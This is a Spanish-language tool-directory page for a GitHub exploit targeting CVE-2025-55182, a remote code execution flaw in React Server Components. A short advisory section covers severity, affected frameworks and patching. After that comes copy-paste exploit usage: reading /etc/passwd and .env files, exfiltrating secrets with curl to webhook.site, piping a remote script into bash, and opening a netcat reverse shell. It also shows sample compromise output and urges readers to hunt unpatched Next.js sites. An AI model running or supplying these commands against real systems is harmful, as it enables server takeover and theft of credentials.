Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Herramientas/GitHubGitHub/shen771/blackash-cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingCommand and ControlLearning & EducationRed TeamingRemote Access Tool
GitHubshen771/blackash-cve-2025-55182

Blackash-CVE-2025-55182

30hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182

Ver Repositorio

🚨 CVE-2025-55182 — Vulnerabilidad Crítica en React Server

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 ¿Qué Es?

  • ⚛️ Una falla de seguridad crítica en React Server Components (RSC)
  • 🧨 Causada por deserialización insegura
  • 🌐 Explotable mediante peticiones de red
  • 🔓 No requiere autenticación
  • ☠️ Puede llevar a Ejecución Remota de Código (RCE)

✅ Esto significa que atacantes podrían ejecutar código arbitrario del lado del servidor con una sola solicitud manipulada.


📊 Gravedad

  • 🔴 Puntuación CVSS: 10.0 (Crítica)
  • 🏴‍☠️ Complejidad del ataque: Baja
  • 🔑 Privilegios requeridos: Ninguno
  • 👤 Interacción del usuario: Ninguna
  • 💥 Impacto: Posible compromiso total del sistema

📦 Tecnologías Afectadas

⚠️ Sistemas que utilicen React Server Components, incluyendo:

  • ✅ Paquetes React server DOM

  • ✅ Frameworks que incluyan RSC, como:

    • Next.js (App Router + RSC)
    • Plugins RSC de Vite
    • Herramientas RSC de Parcel
    • Redwood, Waku, etc.

❌ No afectados:

  • Apps React del lado del cliente puras
  • Apps que NO usen Server Components

🔥 Por Qué es Peligroso

  • 🧑‍💻 Atacantes pueden ejecutar comandos en tu servidor
  • 🗃️ Posibilidad de robar bases de datos y secretos
  • 🦠 Puede usarse para desplegar ransomware o backdoors
  • 🔄 Puede permitir movimiento lateral en la infraestructura
  • 🚀 Explotable a gran escala

🛠️ Qué Hacer Inmediatamente

✅ 1. Parchear y Actualizar

  • ⬆️ Actualizar React a versiones parcheadas
  • ⬆️ Actualizar Next.js o cualquier framework basado en RSC

✅ 2. Auditoría de Dependencias

  • 🔍 Escanear paquetes vulnerables transitivos

  • 🧾 Usar:

    • npm audit
    • pnpm audit
    • yarn audit

✅ 3. Protección Temporal (No es una Solución Completa)

  • 🛡️ Reglas de WAF
  • 🔐 Filtros de validación de solicitudes
  • 🚫 Bloquear payloads sospechosos

⚠️ Estas solo reducen el riesgo — NO reemplazan el parcheo


👥 ¿Quiénes Deberían Preocuparse?

  • ✅ Desarrolladores Full-stack que usen Next.js App Router

  • ✅ Equipos DevOps que alojen apps React SSR

  • ✅ Ingenieros de seguridad que monitoreen:

    • Servicios web Node.js
    • Entornos de ejecución Edge
    • Apps SSR sin servidor

📌 Conclusión Clave

🚨 Si tu app usa React Server Components y no está parcheada — potencialmente está completamente comprometida ahora mismo.


🚨 Aquí tienes todos los comandos rápidos que necesitarás (copiar y pegar → resultado instantáneo):

CVE-2025-55182.py (RCE básica)

root@kitploit:~
# Información básica
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"

# Leer archivos
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"

# Exfiltrar
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"

# Descargar y ejecutar (si wget/curl existen)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"

CVE-2025-55182-revshell.py (reverse shell instantánea)

root@kitploit:~
# 1. Iniciar listener (una vez)
nc -lvnp 4444

# 2. Disparar → shell en <3 segundos
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444

Eso es literalmente todo.
Dos scripts, estos 8 comandos → compromiso total en cualquier sitio Next.js sin parchear hoy.
Ve a por esos bounties.

Esto es exactamente lo que verás en tiempo real cuando el exploit funcione (objetivo 100% sin parchear, 3 de diciembre de 2025):

1. Cuando ejecutas el script normal de RCE (CVE-2025-55182.py)
Escribes:

root@kitploit:~
./CVE-2025-55182.py https://target.com "whoami"

Ves instantáneamente en tu pantalla:

root@kitploit:~
[+] CVE-2025-55182 Exploit
[+] Target  : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node

→ Ese "node" (o lo que devuelva el comando) es la salida real del servidor víctima.
Si ejecutas id verás las líneas completas de uid/gid, etc.

2. Cuando ejecutas el script de reverse shell (CVE-2025-55182-revshell.py)
Escribes:

root@kitploit:~
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444

Ves instantáneamente en tu terminal del listener:

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node   420 Dec  3 11:11 .env
...

→ Shell TTY interactiva completa como el usuario node (casi siempre el usuario de la app web). Tienes el control de la máquina.

Eso es literalmente todo.
Si ves algo de lo anterior → el exploit funcionó al 100%.
Si solo obtienes HTTP 403/404 o nada → ya está parcheado o bloqueado por el WAF.

Ve a cazar.


descargo de responsabilidad

Este PoC es solo para pruebas de seguridad autorizadas y uso educativo.
No lo ejecutes contra ningún sistema que no poseas o para el cual no tengas permiso explícito por escrito para probar.
El uso no autorizado es ilegal y puede conllevar un proceso penal.
Úsalo solo en tu laboratorio, programas de bug bounty con alcance claro o en objetivos que te hayan dado permiso.

Tú eres 100% responsable de tus acciones.

Descargar herramienta